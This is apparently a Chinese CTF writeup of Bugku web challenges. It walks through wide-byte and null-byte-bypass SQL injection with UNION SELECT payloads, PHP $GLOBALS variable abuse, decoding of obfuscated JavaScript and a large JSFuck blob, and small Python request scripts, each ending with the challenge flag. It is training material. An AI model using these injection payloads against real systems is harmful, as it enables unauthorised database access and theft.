Bugku部分题目Writeup

持续更新中。。

Web

Web2

题目地址

这题上来一大堆滑稽,特别炫酷。。

用Burp抓包和firebug审查元素都没找到有用的东西,最后不小心碰了下F12..惊现flag..

告诉自己以后别忘了“右键”-“查看元素”

sql注入

题目地址
首先抓了个包。
发现编码方式为GBK,经过测试后为宽字节注入。

http://103.238.227.13:10083/?id=-1%d5'
显示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1誠'' LIMIT 1' at line 1

发现注入方法就好办了,直接order by 判断有多少列

http://103.238.227.13:10083/?id=-1%d5%27 order by 1 --+
页面正常
http://103.238.227.13:10083/?id=-1%d5%27 order by 2 --+
页面正常
http://103.238.227.13:10083/?id=-1%d5%27 order by 3 --+
报错:Unknown column '3' in 'order clause'

说明数据库有两列
然后查询数据库名称

http://103.238.227.13:10083/?id=-1%d5%27 union select null,database() --+
显示为sql5

查询sql5的所有表名:

http://103.238.227.13:10083/?id=-1%d5%27 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+ 
显示为key,test

查询所有字段名:

http://103.238.227.13:10083/?id=-1%d5%27 union select null,group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() --+
显示为id,string,id,key

查询字段内容:

http://103.238.227.13:10083/?id=-1%d5%27 union select 1,group_concat(id,0x7e,string) FROM .key --+
key    1~54f3320dc261f313ba712eb3f13a1f6d,2~aaaaaaaaaa

根据题目要求:查询key表,id=1的string字段
可得string的内容为54f3320dc261f313ba712eb3f13a1f6d

flag为

KEY{54f3320dc261f313ba712eb3f13a1f6d}

SQL注入1

题目地址

判断列数:

http://103.238.227.13:10087/?id=1 o%00rder by 1
正常回显
http://103.238.227.13:10087/?id=1 o%00rder by 2
正常回显
http://103.238.227.13:10087/?id=1 o%00rder by 3
没有正常回显

确定列数为2

查询数据库名称

http://103.238.227.13:10087/?id=1 uni%00on sel%00ect 1,database() --+

数据库名称为sql3
然后查询数据库的所有的表名

http://103.238.227.13:10087/?id=1 un%00ion s%00elect 1,group_concat(tab%00le_name) FR%00OM info%00rmation_schema.t%00ables WHE%00RE ta%00ble_schema=database() --+

返回:hash,key,temp

然后查询key中的字段hash的内容:

http://103.238.227.13:10087/?id=1 un%00ion sel%00ect 1,gr%00oup_co%00ncat(id,0x7e,hash) FR%00OM .key --+

返回1~c3d3c17b4ca7f791f85e#$1cc72af274af4adef

因此hash字段的内容应为c3d3c17b4ca7f791f85e#$1cc72af274af4adef

所以flag为:

KEY{c3d3c17b4ca7f791f85e#$1cc72af274af4adef}

变量1

题目地址

flag In the variable ! 
<?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
eval("var_dump($$args);");
}
?>

看样子关键点在

eval("var_dump($$args);");

此处考察了PHP的一个小知识点–超全局变量

$GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。
PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。

因此令$args=GLOBALS可以使得

eval("var_dump($GLOBALS);");

从而打印出所有全局变量的值

Payload:

http://120.24.86.145:8004/index1.php?args=GLOBALS

回显

array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" } 

因此flag为

flag{92853051ab894a64f7865cf3c2128b34}

Web4

题目地址

根据提示右键查看源代码,发现一段JS代码

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

URL解码得

var p1 = 'function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b';
var p2 = 'aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;';
eval(unescape(p1) + unescape('54aa2' + p2));

虽然没学过JS,但编程语言的思想都差不多。
最后执行的语句应该是

function checkSubmit()
{
    var a=document.getElementById("password");
    if("undefined"!=typeof a)
    {
        if("67d709b2b'+'54aa2'+'aa648cf6e87a7114f1"==a.value)        return!0;
        alert("Error");
        a.focus();
        return!1
    }
}
document.getElementById("levelQuest").onsubmit=checkSubmit;';

尝试提交”67d709b2b’+’54aa2’+’aa648cf6e87a7114f1”
即67d709b2b54aa2aa648cf6e87a7114f1

获得flag:

KEY{J22JK-HS11}

成绩单

题目地址

查询成绩,明显是考察SQL注入,经过测试为Post注入。

有四个查询位而且都有回显。

查询数据库名称:

id=-1%27union select database(),2,3,4%23

回显:skctf_flag

查询表名:

id=-1%27union select table_name,2,3,4 from information_schema.tables where TABLE_SCHEMA=database() LIMIT 0,1%23

回显:fl4g

查询字段名:

id=-1%27union select column_name,2,3,4 from information_schema.columns where TABLE_SCHEMA=database() and table_name='fl4g' LIMIT 0,1%23

回显:skctf_flag

查询字段内容:

id=-1%27union select skctf_flag,2,3,4 from fl4g%23

回显:BUGKU{Sql_INJECT0N_4813drd8hz4}

flag为:

BUGKU{Sql_INJECT0N_4813drd8hz4}
当时校赛这题没做出来。。(╯‵□′)╯︵┻━┻

Web6

题目地址

右键查看网页源代码:


没别的东西,抓包试一下。发现在响应包中返回了一个flag参数,而且每次都会变。
比如:

flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RFeU5EQTQ=

解码后:

跑的还不错,给你flag吧: ODEyNDA4

再次解码:

812408

根据提示提交每次解码后获得的margin参数来获取flag。写脚本:

#--coding:utf-8--

import requests
import base64

url = "http://120.24.86.145:8002/web6/"
r = requests.session()

headers = r.get(url).headers
x = base64.b64decode(headers['flag']).split(':')
key = base64.b64decode(x[1])

data = {'margin':key}
re = r.post(url = url, data = data).content

print (re)

flag为

KEY{111dd62fcd377076be18a}

cookies欺骗??

题目地址

访问后url变成:

http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

filename参数解一下码

a2V5cy50eHQ=  --> key.txt

于是乎:

index.php --> aW5kZXgucGhw

访问:

http://120.24.86.145:8002/web11/index.php?line=&filename=aW5kZXgucGhw

源代码中有<?php,
line参数是指的回显代码的行数,写个脚本遍历一下。

#-*-coding:utf-8-*-

import requests

for i in range(50):
url = "http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
r = requests.get(url).content
print(r),

获得的源代码为:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}

?>

审计代码可知:

构造cookie为:
Cookie: margin=margin
然后读取key.php的值


flag为:

KEY{key_keys}

Web5

题目地址

右键查看源代码。。JSfuck代码,直接扔控制台里执行。

([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]